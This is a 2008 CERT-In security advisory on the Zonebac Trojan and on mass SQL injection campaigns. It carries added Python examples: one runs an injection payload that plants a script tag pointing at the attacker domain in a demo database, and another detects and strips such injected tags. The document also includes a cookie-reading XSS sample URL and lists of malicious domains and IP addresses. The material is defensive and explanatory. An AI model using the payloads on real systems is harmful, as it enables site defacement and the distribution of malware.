In March 2008, CERT-In issued the following security alerts:


Issue Date: 13 March 2008
Security Alert: ZONEBAC TROJAN
Description: The Trojan is being propagated via malicious PDF files that exploit recently disclosed vulnerabilities in Adobe Reader/Acrobat described in CIAD-2008-09 [Multiple vulnerabilities in Adobe Reader/Acrobat]. A user could be tricked into opening the malicious PDF file (1.pdf) through compromised advertisements appearing on legitimate web sites, or through compromised web pages containing an IFRAME or JavaScript that redirects the user's browser to the malicious PDF file. It could also arrive as an attachment or link in spam e-mail. When the user unknowingly opens this PDF file, the exploit drops the Zonebac Trojan onto the user's system. Upon execution the Trojan scans the infected system to collect information about the running applications and replaces certain program files referenced from the registry with a copy of itself, keeping the same file name to avoid detection. After successful installation the Trojan lowers the system's security settings.

Issue Date: 17 March 2008
Security Alert: Mass SQL Injection attacks and malicious JavaScript embedding on websites
Description: Numerous web sites have been found to contain a reference to a malicious JavaScript file hosted on the domain 2117966.net. Remote attackers are launching SQL injection attacks against ASP web applications and, through them, inserting a link to the malicious JavaScript file (www DOT 2117966 DOT net/fuckjp DOT js) into the content these sites serve. When a user visits an infected site, the script is loaded and executed by the user's browser. It then attempts to exploit several known vulnerabilities on the victim system in order to download password-stealing malware. The downloaded malware tries to make outbound connections to IP address 61.188.39.175 on port 2034. Mass attacks have also been reported against web sites running phpBB, using IFRAME injection to redirect visitors to malicious web sites. Subsequently, mass IFRAME and JavaScript injection attacks have been reported using the malicious domain www DOT nmidahena DOT com.
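The injection mechanism the description above refers to, as an added example that is not part of the CERT-In alert. An in-memory SQLite table stands in for a site's content store; sqlite3's executescript() is used to emulate SQL Server executing stacked statements through classic ASP/ADO; the payload is a simplified stand-in (assumed, not the campaign's actual payload) that appends a script tag pointing at the domain named in the alert. The concatenated query is shown beside the parameterized one that defeats it.

```python
import sqlite3

# Everything below is constructed for illustration. The script tag points at the
# domain named in the alert; the SQL payload is a simplified stand-in for the
# campaign's, not a copy of it.
INJECTED_TAG = '<script src="http://www.2117966.net/fuckjp.js"></script>'
PAYLOAD = "'; UPDATE news SET body = body || '" + INJECTED_TAG + "'; --"


def make_db():
    """In-memory table standing in for a site's content store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO news (title, body) VALUES (?, ?)",
                     [("Welcome", "Hello world"), ("Notice", "Maintenance tonight")])
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """Classic ASP pattern: build the SQL by string concatenation and send the
    whole string to the database. executescript() emulates SQL Server/ADO, which
    executed stacked statements (sqlite3's execute() would reject the second one).
    Result rows are discarded here; the point is the side effect on the table."""
    sql = "SELECT title FROM news WHERE title LIKE '%" + term + "%'"
    conn.executescript(sql)  # any statements smuggled in `term` run as well


def search_safe(conn, term):
    """Parameterized query: the term is bound as data and cannot alter the
    statement, so the payload is just a search string that matches nothing."""
    rows = conn.execute("SELECT title FROM news WHERE title LIKE ?", ("%" + term + "%",))
    return [r[0] for r in rows]


def injected_rows(conn):
    """How many rows now carry the injected script tag."""
    return conn.execute(
        "SELECT COUNT(*) FROM news WHERE body LIKE '%<script%'").fetchone()[0]


def demo():
    """Run the same payload through both code paths and compare the damage."""
    vuln = make_db()
    search_vulnerable(vuln, PAYLOAD)
    safe = make_db()
    safe_hits = search_safe(safe, PAYLOAD)
    return injected_rows(vuln), injected_rows(safe), len(safe_hits)


if __name__ == "__main__":
    print(demo())  # (2, 0, 0): every row poisoned vs. nothing changed
```

The vulnerable path needs no error or special privilege: a single request carrying the payload in a search field rewrites every row, which is why one campaign could deface thousands of unrelated sites at once.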


SOLUTIONS:


Sl. No. 1
Security Alert: ZONEBAC TROJAN
Description:

* Do not click links or open attachments in untrusted e-mail messages.
* Remain cautious while visiting web sites, whether trusted or untrusted; the malicious PDF was served through advertisements on legitimate sites as well as through compromised pages.
* Search for the malicious files and processes created or started by the Zonebac Trojan and delete them.
* Search for the registry entries made by the Zonebac Trojan (listed in the full CERT-In alert) and delete them.
* Apply the update referred to in the Adobe advisory for the above-mentioned vulnerabilities:
http://www.adobe.com/support/security/advisories/apsa08-01.html
* Keep the operating system and application software up to date with patches and fixes.
* Keep antivirus and antispyware signatures up to date.

Sl. No. 2
Security Alert: Mass SQL Injection attacks & malicious JavaScript embedding on websites
Description:

Website administrators:
* Enable request validation in ASP.NET by setting ValidateRequest="true" in the @ Page directive or in the <pages> element of the configuration file. Request validation only rejects requests that contain HTML-like markup; it does not stop SQL injection by itself.
* Input filtering: properly validate and sanitize all user-supplied data before it reaches a database query, and use parameterized queries rather than building SQL by string concatenation.
* Clean up injected content: locate the injected script and IFRAME references in affected pages and database fields and remove them or safely comment them out. This removes only the symptom; unless the injection flaw is fixed, the content will be re-injected.
* Do not rely on server-side filtering for data that never reaches the server. In a URL such as
http://www.vulnerable.site/welcome.html#name=<script>alert(document.cookie)</script>
the part after # is not sent to the server, so client-side script that reads it (DOM-based cross-site scripting) must treat it as untrusted.
* Output filtering: encode user data when it is sent back to the user's browser.
* Disable client-side scripting where it is not needed.
* Use signed scripting: implement "signed scripting" so that any script with an invalid or untrusted signature does not run automatically.
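The "locate and clean up injected content" step above, as an added example that is not part of the CERT-In alert. It scans page or database content for script and IFRAME sources on the domains named in the alert and strips the matching elements; the sample page is constructed, and the path under nmidahena.com is a placeholder, not an observed URL.

```python
import re
from urllib.parse import urlparse

# Indicators taken from the alert; everything else here is constructed.
BLOCKED_HOSTS = {"www.2117966.net", "2117966.net", "www.nmidahena.com", "nmidahena.com"}

SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)
IFRAME_SRC = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)
# Whole script/iframe elements, so a flagged one can be removed in one piece.
ELEMENT_RE = re.compile(r"<(script|iframe)\b[^>]*>.*?</\1\s*>", re.I | re.S)

# Constructed sample: one legitimate script plus the two injection styles
# described in the alert (unquoted src was typical of the SQL-injected tag).
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src=http://www.2117966.net/fuckjp.js></script>
</head><body>
<iframe src="http://www.nmidahena.com/index.html" width=0 height=0></iframe>
<p>Maintenance tonight</p></body></html>"""


def external_refs(html):
    """Return (tag, url) for every script and iframe source in the content."""
    refs = [("script", m.group(1)) for m in SCRIPT_SRC.finditer(html)]
    refs += [("iframe", m.group(1)) for m in IFRAME_SRC.finditer(html)]
    return refs


def host_of(url):
    """Host part of a src value; relative paths yield '' and never match."""
    if "://" not in url and not url.startswith("//"):
        url = "//" + url  # accept bare host/path forms as well as full URLs
    return (urlparse(url).hostname or "").lower()


def find_injections(html, blocked=BLOCKED_HOSTS):
    """Script/iframe references that load from a blocked host."""
    return [(tag, url) for tag, url in external_refs(html) if host_of(url) in blocked]


def strip_injections(html, blocked=BLOCKED_HOSTS):
    """Remove whole script/iframe elements whose src is on a blocked host.
    This cleans the symptom only: unless the injection flaw is fixed the
    tags come back on the next attack run."""
    def drop(match):
        element = match.group(0)
        hit = any(host_of(u) in blocked for _, u in external_refs(element))
        return "" if hit else element
    return ELEMENT_RE.sub(drop, html)


if __name__ == "__main__":
    for tag, url in find_injections(SAMPLE_PAGE):
        print(f"injected {tag}: {url}")
    print(strip_injections(SAMPLE_PAGE))
```

Run the same two functions over every text column of the database, not only over rendered pages, since the campaign wrote the tag into stored content and every page that displays that column serves it.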
System Administrators and Users:
* Block access to the domains "www DOT 2117966 DOT net" and "www DOT nmidahena DOT com" at the gateway.
* Disable JavaScript and ActiveX scripting in the browser settings, or use the NoScript extension with the Firefox browser.
* Block traffic to and from the IP address 61.188.39.175 (the downloaded malware connects to it on port 2034).
* Apply the patches for the above-mentioned vulnerabilities.
* Keep the OS and application software up to date with patches and fixes.
* Install and maintain updated anti-virus software at the gateway and on desktops.